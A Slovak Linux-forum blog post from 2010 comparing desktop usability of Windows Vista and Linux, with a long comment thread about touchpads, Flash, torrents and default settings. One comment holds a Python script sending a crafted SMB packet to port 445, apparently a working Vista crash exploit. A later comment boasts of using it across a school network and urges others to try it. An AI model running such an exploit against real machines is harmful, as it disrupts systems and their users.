abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 15:55 | Nová verze

    Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    dnes 13:44 | IT novinky

    Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.

    Ladislav Hagara | Komentářů: 0
    dnes 04:44 | Nová verze

    Po roce vývoje od vydání verze 1.24.0 byla vydána nová stabilní verze 1.26.0 webového serveru a reverzní proxy nginx (Wikipedie). Nová verze přináší řadu novinek. Podrobný přehled v souboru CHANGES-1.26.

    Ladislav Hagara | Komentářů: 0
    dnes 04:33 | Nová verze

    Byla vydána nová verze 6.2 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.14.

    Ladislav Hagara | Komentářů: 0
    dnes 04:22 | Nová verze

    Byla vydána nová verze 30.0.0 frameworku pro vývoj multiplatformních desktopových aplikací pomocí JavaScriptu, HTML a CSS Electron (Wikipedie, GitHub). Chromium bylo aktualizováno na verzi 124.0.6367.49, V8 na verzi 12.4 a Node.js na verzi 20.11.1. Electron byl původně vyvíjen pro editor Atom pod názvem Atom Shell. Dnes je na Electronu postavena celá řada dalších aplikací.

    Ladislav Hagara | Komentářů: 1
    dnes 04:11 | Nová verze

    Byla vydána nová verze 9.0.0 otevřeného emulátoru procesorů a virtualizačního nástroje QEMU (Wikipedie). Přispělo 220 vývojářů. Provedeno bylo více než 2 700 commitů. Přehled úprav a nových vlastností v seznamu změn.

    Ladislav Hagara | Komentářů: 0
    včera 23:22 | IT novinky

    Evropský parlament dnes přijal směrnici týkající se tzv. práva spotřebitele na opravu. Poslanci ji podpořili 584 hlasy (3 bylo proti a 14 se zdrželo hlasování). Směrnice ujasňuje povinnosti výrobců opravovat zboží a motivovat spotřebitele k tomu, aby si výrobky nechávali opravit a prodloužili tak jejich životnost.

    Ladislav Hagara | Komentářů: 4
    včera 16:11 | Nová verze

    Bylo oznámeno (cs) vydání Fedora Linuxu 40. Přehled novinek ve Fedora Workstation 40 a Fedora KDE 40 na stránkách Fedora Magazinu. Současně byl oznámen notebook Slimbook Fedora 2.

    Ladislav Hagara | Komentářů: 18
    včera 13:44 | Upozornění

    ČTK (Česká tisková kancelář) upozorňuje (X), že na jejím zpravodajském webu České noviny byly dnes dopoledne neznámým útočníkem umístěny dva smyšlené texty, které nepocházejí z její produkce. Jde o text s titulkem „BIS zabránila pokusu o atentát na nově zvoleného slovenského prezidenta Petra Pelligriniho“ a o údajné mimořádné prohlášení ministra Lipavského k témuž. Tyto dezinformace byly útočníky zveřejněny i s příslušnými notifikacemi v mobilní aplikaci Českých novin. ČTK ve svém zpravodajském servisu žádnou informaci v tomto znění nevydala.

    Ladislav Hagara | Komentářů: 27
    včera 13:33 | Komunita

    Byla založena nadace Open Home Foundation zastřešující více než 240 projektů, standardů, ovladačů a knihoven (Home Assistant, ESPHome, Zigpy, Piper, Improv Wi-Fi, Wyoming, …) pro otevřenou chytrou domácnost s důrazem na soukromí, možnost výběru a udržitelnost.

    Ladislav Hagara | Komentářů: 0
    KDE Plasma 6
     (72%)
     (9%)
     (2%)
     (17%)
    Celkem 717 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník

    Čo sa mi páči na Windows (Vista)

    27.8.2010 09:43 | Přečteno: 1691× | Operacne systemy

    Mám rád Linux, nikdy som sa tým netajil. Ale viem ho aj kritizovať, ak sa mi niečo nepáči. Teraz však trošku z iného súdka - konkrétne veci, ktoré v Linuxe (bežné nasadenie na desktop) nie sú tak dobre dotiahnuté ako vo Windows (od XP vyššie, u mňa Vista). Takže:

    1. Touchpad - na kliknutie má väčšiu citlivosť ako v Linuxe. V Linuxe musím niekedy ťuknú silnejšie, niekedy dokonca viac krát. Možno sa to niekde dá nastaviť, nenašiel som (bežná inštalácia Visty vs. bežná inštalácie Mandrivy/Fedory/Ubuntu z liveCD)

    2. Nepadá flash - nie je to možno problém primárne Linuxu ale skôr Adobe. No mňa ako používateľa to nemusí zaujímať - v Linuxe (bez ohľadu na distribúciu, použitý prehliadač) flash padne niekoľko krát denne, vo Windows je to skôr dôvod na otvorenie šampanského.

    3. Lenivosť aplikácií - Firefox vo Windows, Firefox rovnakej verzie v Linuxe. Teda na prvý pohľad by mali fungovať rovnako. Ani náhodou, linuxová verzia je o dosť pomalšia. A nie, nemám zapnuté efekty prostredia (u Visty som skúšal aj Aero a nemalo na rýchlosť odozvy aplikácie vplyv), vyťaženie stroja je +- rovnaké u Linuxu s GNOME ako u Visty (CPU, reálne obsadenie RAM).

    4. Nedotiahnutosť aplikácií - spomeniem torrent klienta. Niekedy zaštrajkuje a neťahá (Ktorrent), inokedy má dosť peerov a ťahá ako slimák (transmission). Po prepnutí do Windows ten istý torrent v utorrente beží na plnú rýchlosť linky. Nastavenia sú rovnaké, torrent (vlastne akéhokoľvek p2p) klienta si viem nastaviť. V Linuxe ale namám možnosť skúšať desiatky rôznych GUI klientov na torrent, pretože nie sú. Vo Windows (keby ten utorrent nešiel) ich je o dosť viac (a podobne aj v iných kategóriách aplikácií).

    Stále sa nemôžem zbaviť dojmu, že najlepšie obdobie Linuxu na desktope je už za nami. Aspoň mne osobne najlepšie fungovali distribúcie okolo roku 2006-2007. Odvtedy je to samá "novinka", ktorá nejakým spôsobom pohodlie pri používaní kazí. Najlepší systém je taký, o ktorom neviem - kedy si po hodinách práce uvedomím, že aha, ja používam Windows/Linux/BSD/čokoľvek.        

    Hodnocení: 38 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    vain avatar 27.8.2010 09:56 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Asi bych ti to lehce shrnul a předem říkám, zamysli se, jestli je problém opravdu v Linuxu.

    1) S touchpadem nemám žádný problém, respektive v Lubuntu ano, ve Fedoře ne. Proto si myslím že pes je zakopán někde jinde.

    2) Flash mi taky nepadá, snad ani nepamatuji kdy. Používám ho v Chromiu, že by problém Firefoxu?

    3) Chromium mi jede úplně stejně rychle jako Chrome ve Windows, že by opět problém Firefoxu?

    4) Používám Deluge a tahá mi krásně dvě mega za sekundu, tedy přesně limit mého připojení, s Transmission jsem měl ve starších verzích taký problém, takže problém opět jinde a ne v Linuxu?

    Stále se nemůžu zbavit dojmu, že lidé nerozeznávají problémy Linuxu jako takového a jednotlivých aplikací.
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 10:07 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    touchpad je v linuxe menej citlivy bez ohladu na distribuciu.

    flash pada bez ohladu na prehliadac, ako som aj napisal v blogu.

    chromium (chrome) nie je zle, ale... pisal som vseobecne o aplikaciach a ich odozve - firefox, gimp, inkscape, vsetko je v linuxe vizualne s pomalsou odozvou

    kde moze byt potom problem s torrentom, ked rebootnem do windows, spustim rovnaky torrent s rovnakym nastavenim portov, poctu pripojeni, ... a vo windows to leti.

    ja rozoznavam problem aplikacii a systemu. ale ta aplikacia bezi pod systemom, pre moju pracu (zabavu) je to vtedy jeden celok.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 10:08 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    menej citlivy na kliknutie dotykom som myslel - pohyb je OK.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    vain avatar 27.8.2010 10:13 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    touchpad je v linuxe menej citlivy bez ohladu na distribuciu.
    A já říkám, že není, přeber si to.
    flash pada bez ohladu na prehliadac, ako som aj napisal v blogu.
    To teda nepadá, když mi nikdy nespadl.
    chromium (chrome) nie je zle, ale... pisal som vseobecne o aplikaciach a ich odozve - firefox, gimp, inkscape, vsetko je v linuxe vizualne s pomalsou odozvou
    Nic takového nepozoruji a to Gimp Chromium nebo Gajim používám na obou platformách.
    kde moze byt potom problem s torrentom, ked rebootnem do windows, spustim rovnaky torrent s rovnakym nastavenim portov, poctu pripojeni, ... a vo windows to leti.
    To mi je fuk, kde máš problém, ale když mi to stahuje maximální rychlostí, tak problém evidentně není všeobecný.
    ja rozoznavam problem aplikacii a systemu.
    Evidentně ne.
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 10:31 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    u mna ano.

    u mna ano (na dvoch roznych strojoch, to uz nebude nahoda).

    u mna ano (na dvoch roznych strojoch, to uz nebude nahoda).

    u mna ano (na dvoch roznych strojoch, to uz nebude nahoda).

    rozoznavam.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    vain avatar 27.8.2010 10:37 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A když to je jen u tebe, tak to necpi ostatním jako nevýhodu Linuxu.
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 10:44 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    preco by som to nenapisal, ked u mna je to fakt na viacerych strojoch a u mna to jednoznacne ako nevyhoda linuxu (plus pribalenych aplikacii) JE.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    vain avatar 27.8.2010 10:50 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Já používám Linux taky na vícero strojích a tyhle problémy nemám a že bych o tom někde psal přiblblé blogové zápisky? Ne.
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 11:26 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    no kedze vraj problem ziaden nemas, tak je to logicke.

    ani ja by som nepisal o tom, ze flash ide, touchpad reaguje dobre.. a tak podobne.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    vain avatar 27.8.2010 11:31 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Tak aspoň dej odkazy na bug reporty, já ti klidně zahlasuju, ať máš radost.
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 18:36 aaaaaaaaa
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    o co ti jde? co svou arogancí sleduješ?
    29.8.2010 05:38 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ma to podle tebe vyznam rvat "Linux rules!" na linuxovem foru? Nekomu stoji, nekomu ne...

    Preber si ty svoje priblble komentare...

    p.s. Futurama VI nic moc.
    pavlix avatar 31.8.2010 01:00 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ma to podle tebe vyznam rvat "Linux rules!"
    Podívej se výše a poznáš, že tam žádné linux rules nepadlo. Doporučuju očního.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    31.8.2010 21:06 Petr "Glubo" Sýkora | skóre: 21 | blog: Glubnik
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Příloha:
    ad touchpad: man synaptics
    „O mrtvých jen v dobrém." „Pojďme se bavit o Stalinovi."
    27.8.2010 10:00 chrono
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    2. Flash mi ešte nikdy nepadol (ale zase je pravda, že ho aš tak často nepoužívam).

    4. Vuze mi sťahuje takou rýchlosťou, ako mu povolím (teda ak je dosť peerov). Skúšal som aj iné programy a tiež fungovali normálne.
    27.8.2010 17:18 Mandarinka
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Vuze je jak pro windows tak pro linux pokud si pamatuju, možná by mohl vyřešit ten problém s těmi torrenty. Pokud si vzpomínám, tak ktorrent a transmission my před lety taky moc dobře nefungovaly, možná je to tím, když člověk nemá veřejneou adresu/porty, nevím.
    27.8.2010 10:06 A
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    mne sa svojho casu ked som skusal Vistu pacilo toto:
    #!/usr/bin/python
    from socket import socket
    from time import sleep
    
    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" 
    "\xff\x53\x4d\x42" 
    "\x72\x00\x00\x00" 
    "\x00\x18\x53\xc8" 
    "\x00\x26"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close() 
    AsciiWolf avatar 27.8.2010 10:15 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    :-D
    27.8.2010 15:32 Mercuriuz | skóre: 16 | blog: Mercuriuz | V hospodě =)
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    me taky, strasne moc, dodelal sem k tomu se salamkem bash script kterej to postupne odesilal na vsechny aktivni ip adresy v danym rozsahu, bourali jsme skolu zevnitr xD
    Linux users everywhere, raise your keyboards into the air, we´re warriors, warriors of the world.
    27.8.2010 15:51 rainman
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ten import fce sleep má nějaký skrytý význam nebo je na matení nepřítele ? ;-)
    Limoto avatar 27.8.2010 16:06 Limoto | skóre: 32 | blog: Limotův blog
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    :-D funguje to ještě? ani by mě to nepřekvapilo :-D
    27.8.2010 16:34 Mercuriuz | skóre: 16 | blog: Mercuriuz | V hospodě =)
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    me taky ne, na 100% to pojede na neaktualizovanych strojich, kterych je bych rekl vic nez dost, just do it :)
    Linux users everywhere, raise your keyboards into the air, we´re warriors, warriors of the world.
    Max avatar 27.8.2010 10:22 Max | skóre: 72 | blog: Max_Devaine
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    No, co vím, tak touchpad se dá normálně nastavovat jako myš a jako cokoliv jiného. Buď si to můžeš naklikat ve svém oblíbeném DE, nebo přímo nastavit v xorg.conf : Gentoo wiki : Synaptics Touchpad, nebo Archlinux wiki : Touchpad Synaptics
    Lze pak dělat hodně zajímavé tweakování čehokoliv, co se jen touchpadu přiblíží. Nevím, jak moc jsi se snažil při řešení svého problému, ale řekl bych, že asi moc ne :-/
    Zdar Max
    Měl jsem sen ... :(
    27.8.2010 10:28 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    pisem o default nastaveni po instalacii.

    a to klikatko v gnome/kde nic takeho nema.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 12:04 BlackShark | skóre: 15 | blog: windows
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Příloha:
    Nesouhlasim. V KDE tusim jsem nic nevidel, ale v Gnome (Mint Isadora) rozhodne konfiracni nastroj je. Minimalne je mozne ho doinstalovat.
    27.8.2010 12:39 __dark__
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Když toto klikátko porovnám s tím ve Windows, tak je to jen parodie. Jak si můžu něco nastavit, když tam není něco jako oblast, kde si to nastavení můžu vyzkoušet?
    vain avatar 27.8.2010 12:56 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    To si poznal podle oříznutého screenu? =)
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 12:59 __dark__
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    to jsem si nevšiml, vypadá to jak nějaká chyba :-)
    vain avatar 27.8.2010 13:18 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jako já nevím, jak ta aplikace vypadá, jen že bych to podle toho screenu nesoudil ;-)
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    27.8.2010 17:00 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    a kde tam je citlivost na klik? nikde to tam nevidim.

    je tam cistlivost (co ovplyvnuje "rychlost"), nie citlivost na klik.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    27.8.2010 17:29 Robo
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    2hy tab ty ... ehm :-)
    27.8.2010 20:43 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    screen? u mna tam nic take nebolo - ale mint (ci co to) nemam.
    Keďže tu účet nejde zrušiť, zmenil som si heslo na random a "zabudol ho".
    29.8.2010 05:13 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Nejak ti ten Linux ani neumi udelat solidni PrintScreen... Nebo to je nejaky novy Red Ribbon?
    gtz avatar 29.8.2010 18:39 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ten PrintScreen je upravený ... proč by sem někdo dával nějakého macka v 1900x1200 :)
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    30.8.2010 00:46 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Nem, ja narazel na ten cerveny prouzek. Asi blbej vtip v blbou hodinu.
    default avatar 27.8.2010 10:51 default | skóre: 22 | Madrid
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Lze pak dělat hodně zajímavé tweakování čehokoliv, co se jen touchpadu přiblíží. Nevím, jak moc jsi se snažil při řešení svého problému, ale řekl bych, že asi moc ne :-/
    Hele, sorry, že ti do toho vstupuju, ale já mám pocit, že chlapec nám chtěl sdělit, že místo nějakýho tweakování chce raději klikat.

    A tím se dostáváme k jádru pudla. Když si tu někdo postěžuje, že v Linuxu se musí všechno nastavovat, tak je oheň na střeše, že to je lež. Když si někdo posteskne, že výchozí konfigurace je přinejmenším diskutabilní, tak mu pošleš linky na nějaký tweakování. Tak jak to teda je?

    Udělejte si tu pořádek, jó. :-D
    27.8.2010 10:56 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Já myslím, že by si především měli udělat pořádek ti, kdož si myslí, že může existovat nějaké defaultní nastavení, které je na všech počítačích optimální. To je značně naivní představa.

    Proto mrmlání nad tím, že na jednom konkrétním stroji je default horší než windowsový, může fungovat maximálně jako dobrý vztekosvod, ale užitečnou informaci to žádnou nepřinese.
    default avatar 27.8.2010 11:18 default | skóre: 22 | Madrid
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Jako jó i né. Mít dobrý defaultní nastavení je dost praktická věc. Pro mě osobně je hodně důležitá. Každou chvíli dělám na cizích počítačích s prázdným profilem. Se znalostí defaultního nastavení nemusím ztráce půl dne jen rekonfigurací, aby mi vodotryck stříkal dvaatřicet centimetrů vysoko pod úhlem pětačtyřiceti stupňů.

    Život je jednodušší, když se s určitým nepohodlím smíříš. Není nic horšího, než přijít ke kompu a začít bušit klávesový zkratky a po pěti minutách zjistit, že to nedělá nic nebo ještě lépe — dělá něco jinýho.

    Ale rozumím tomu, že drtivá většina lidí dělá s jedním počítačem, takže si ho může natweakovat. :-) A když už náhodou musej dělat na jinym, tak mají na flešce všechny ty .bashrc, .profile, konfigurace vimů a emacsů. :-D Což je mimochodem děsně praktický, když sdíliš jeden účet s vícero lidmi. :-D
    27.8.2010 11:42 Ondrej 'SanTiago' Zajicek
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ono nejde ani tak o to, ze jedno nastaveni nebude na vsech pocitacich optimalni, ale spis ze jedno nastaveni nebude pro vsechny uzivatele optimalni. Napriklad me prijde nizsi citlivost touchpadu jako vyhoda - mensi riziko, ze pri psani na klavesnici ho nahodne aktivuju dlani. Optimalni nastaveni pro mne je vypnuty touchpad, ale chapu, ze to neni globalne rozumny default.
    27.8.2010 12:38 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Mít dobrý defaultní nastavení je dost praktická věc.
    To zajisté je. Ale soudit na kvalitu defaultního nastavení podle jedné konkrétní zkušenosti nedává smysl.
    Což je mimochodem děsně praktický, když sdíliš jeden účet s vícero lidmi. :-D
    Což je možná další z důvodů proti sdílení účtů více lidmi ;)
    29.8.2010 05:27 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Aha... Nebudu se poustet do hodnoticich komentaru, ale povez mi prosim - kolikpak, Karkulko, spravujes pocitacu?

    A kdyz si te nekdo zavola, a obvzlast clovek, u ktereho ocekavas nulove zmeny v default nastaveni, tak jak je ti potom prijemne litat bud kursorem, popr. samotnou mysi na stole jak jebnutej, abys neco udelal (tj. neco dal doporadku u nekolika z min. 50ti lidi)?

    Default nastaveni ma sve opodstatneni a proto do nej firmy typu MS a Apple lejou prachy. To ze to tady holcicky a chlapecci nechapajo je jiz jina... O osvobozenecky boj firmam opravdu nejde.
    Fluttershy, yay! avatar 29.8.2010 09:12 Fluttershy, yay! | skóre: 92 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    V takových situacích člověk beztak používá vlastní upravenou verzi distribuce se specifickým softwarem a nastaveními, obrazy se klonují snadno, konfiguráky se kopírují neméně snadno. Nebo snad myslíš, že se někde používá čístá výchozí instalace MS Windows? Pochybuju. Ostatně, MS Windows AFAIK běžně používají pro nastavení touchpadu software třetích stran.
    🇵🇸Touch grass🇺🇦 ✊ no gods, no masters
    30.8.2010 00:50 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Mno, mel jsem na mysli kombinaci Win, Lin a Solarek.

    A ty TP utilitky jsou pravda vetsinou od vyrobce HW, to je fakt...
    29.8.2010 09:59 Martin Mareš
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ale povez mi prosim - kolikpak, Karkulko, spravujes pocitacu?
    Okolo 80 a nemám s tím sebemenší problémy.
    30.8.2010 00:56 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    V tom pripade mi nezbyva nez smeknout a pogratulovat vrozene prizpusobivosti.

    Nicmene stale verim, ze neco jako "optimalni nastaveni" existuje - stejne jako se hezka holka bude libit vetsine chlapum (ale ne vsem do jednoho). Ale to uz mnohem lepe shrnul default o krapet vyse (zvlast s tim smirenim se s jistou mirou nepohodli): http://www.abclinuxu.cz/blog/Fedorka_a_spol/2010/8/co-sa-mi-paci-na-windows-vista/diskuse#21
    29.8.2010 11:33 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Default nastaveni ma sve opodstatneni a proto do nej firmy typu MS a Apple lejou prachy.
    Apple možná, ale MS rozhodně ne.
    Windows v defaultním nastavení používá ten, kdo je buď masochista nebo naprostý BFU. Jinak skoro každej tento OS nastaví množstvím 3rd party SW, aby byl vůbec použitelnej.
    30.8.2010 01:04 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ok, je fakt, ze ja jsem odkojenej Okenar, pac v dobe Apple s jednim tlacitkem na mysi jsem si proste vybral :-) , no a tak proto jsem i kdysi silou tlacil KDE3 k podobnemu chovani.

    Kze mozna proto se mi Win pouzivaji docela v pohode / nativne (no, Vista az tolik ne, 7 uz se mi zase libily), ale je zase fakt, ze si docela rozumim posledni dobou i s Gnome. Ze by nejaka "standardizace", hehe?

    Nicmene asi jsem se nechal unest a spise jsem hlavne chtel zduraznit, ze "tweakovani" je fajn, ale naklikani je proste pro BFU mnohem blizsi. Pro BFU je prece uprava Gconfu neco na urovni programovani...
    30.8.2010 01:17 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    No po pravdě řečeno mám dojem, že mnoho BFU už jsou tak zmlsaní, že jim nevoní už ani ten klikací nastavovací dialog. Takovejch tlačítek a checkboxů, takovýho textu, a ještě na několika tabech, hrůza. Radši zavolá Frantu od vedle, ten tomu rozumí, ten to našteluje... :/
    kotyz avatar 30.8.2010 01:38 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    ten to nasteluje a uz to ani nenabootuje a pak se musi volat jeste Pepa (z depa), aby to preinstaloval :-D
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    30.8.2010 01:41 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Preeeesne! :-D
    30.8.2010 01:39 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Taky pravda. Ale jestli to neni nahodou jenom dobre. ;-)
    kotyz avatar 30.8.2010 01:53 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    pro Frantu, kterej za to postelovani dostane dve kila nebo flasku to dobre urcite je ;-) a co teprv pro Pepu, kterej za tu reinstalaci dostane jeste vic, protoze to je vec ktera se neudela sama za pet minut ...
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    30.8.2010 02:29 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A taky pravda. I tohle je rozumny uhel pohledu. ;-)
    Max avatar 28.8.2010 01:01 Max | skóre: 72 | blog: Max_Devaine
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Nauč se číst ;-). Jasně jsem snad napsal, že si to může naklikat ve svém oblíbeném DE, nebo natweakovat v konfigurácích. Uvedl jsem tedy oba způsoby nastavení, jen jsem uvedl odkazy pouze k druhé možnosti, protože si u první možnosti nepamatuji názvy těch klikátek ;-)
    Zdar Max
    Měl jsem sen ... :(
    29.8.2010 05:20 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    A uz ti mezitim ve vlakne bylo vyvraceno, ze to proste jednoduse nejde nakilkat, jako ve Win. Tj. ty parametry, ktere jsou jaksi crucial...

    Zdar Knowtorious
    Fluttershy, yay! avatar 29.8.2010 09:06 Fluttershy, yay! | skóre: 92 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Vážně to nejde jednoduše naklikat? Já teda mám v KDE luxusní dialog, v němž si můžu nastavit citlivost, několik druhů scrollování (včetně víceprstového), parametry snímání ťuknutí do touchpadu a akce na ťuknutí v různých částech touchpadu, případně na ťuknutí více prsty.
    🇵🇸Touch grass🇺🇦 ✊ no gods, no masters
    30.8.2010 01:15 Knowtorious
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    V tom pripade se omlouvam. KDE 4 nejako neznam / vyhybam. Mozna tedy i zbytecne...
    pavlix avatar 31.8.2010 01:06 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Používáš tedy argumenty z neznalosti? Doporučuju vyzkoušet aktuální alternativy a pustit se do diskuze znovu.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    29.8.2010 12:31 kralyk z abclinuxu | skóre: 29 | blog:
    Rozbalit Rozbalit vše Re: Čo sa mi páči na Windows (Vista)
    Ona ta "naklikatelnost" je imho dost přeceněná.
